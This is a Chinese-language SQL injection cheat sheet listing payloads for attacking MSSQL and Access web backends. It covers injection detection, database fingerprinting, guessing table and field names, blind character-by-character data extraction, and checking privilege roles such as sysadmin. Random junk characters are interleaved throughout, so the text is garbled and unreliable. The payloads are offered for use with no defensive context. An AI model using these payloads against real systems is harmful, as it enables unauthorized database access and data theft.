1.判断是否有注入;and 1=1 ;and 1=2 +Hb6j02#
2.初步判断是否是mssql ;and user>0 Ffm Q$>S
NoJo-vo*
3.注入参数是字符'and [查询条件] and ''=' w
I@
lO\
AMYoSc
4.搜索时没过滤参数的'and [查询条件] and '%25'=' XY|-qd}A
NG_O I*|~
5.判断数据库系统 79%${ajSI
=fHt|}.K
;and (select count(*) from sysobjects)>0 mssql )vS##-[_
Te>7I
;and (select count(*) from msysobjects)>0 access *k'9 %'<
CFZ=!s)B
=dX*:An
PSHs<Z47
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %p2 C5z?
S&]:=He
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `>8|
(>0d+ KT
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 XR\ iQ
hBE}?J>
9.(1)猜字段的ascii值(access) <UQ:1W8>B
7B%@f9g
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (7ew&u\Li
eOn,`B1
(2)猜字段的ascii值(mssql) fD\h5`-
df1* [
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 u(ZS sftat
1"odkM
10.测试权限结构(mssql) BJj~fNm1Zr
3 XfXMVm
SsznV}{^
mk4%]t"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- jd2Fh):q
m2|0<P@k!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !gf&l ^)
'KQuz)-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- g\(7z
P
wKY6[ vvF
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |x<
\0 WMb
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- (I[o;0w
t41cl
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _i8$!b2Mr
,(`@ZFp$
;and 1=(select IS_MEMBER('db_owner'));-- RL&3 P@r
I;-{#OE,
?$n<